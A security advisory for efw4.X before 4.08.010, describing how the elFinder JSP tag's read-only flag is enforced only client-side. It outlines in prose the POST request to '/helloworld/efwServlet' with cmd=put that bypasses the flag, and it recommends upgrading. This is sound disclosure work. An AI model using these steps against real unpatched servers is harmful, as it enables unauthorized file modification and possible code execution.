efw4.X Server-Side Read-Only Flag Vulnerability in elFinder JSP Tag Allowing Unauthorized File Modifications

A vulnerability exists in efw4.X versions prior to 4.08.010, where the read-only flag on the <efw:elFinder> JSP tag is not properly enforced on the server side. Although the flag is intended to prevent file modifications, an attacker can bypass this restriction by sending direct requests that manipulate files, regardless of the read-only setting. The issue arises because the read-only flag only affects client-side UI elements and response metadata, without being properly validated before write operations are executed. As a result, all file operations can be performed even when the elFinder instance is configured to be read-only and protected.

Impact

This vulnerability completely undermines the read-only security control, which is only applied on the client side. Users can easily bypass this protection by sending direct HTTP requests. This flaw not only allows unauthorized file modifications but could also be exploited in conjunction with other vulnerabilities to achieve remote code execution, all while giving developers a false sense of security.

Reproduction

To reproduce this vulnerability, configure the elFinder instance with 'protected=true' and 'readonly=true'. Then, send a POST request to the '/helloworld/efwServlet' endpoint, including the 'cmd' parameter set to 'put', along with the 'id', 'target', 'content', 'encoding', 'isAbs', 'home', and 'readonly' parameters. The response will indicate that the write operation was successful, despite the read-only flag being active.

Remediation

Users should update to efw4.X version 4.08.010 or later, where this vulnerability has been fixed.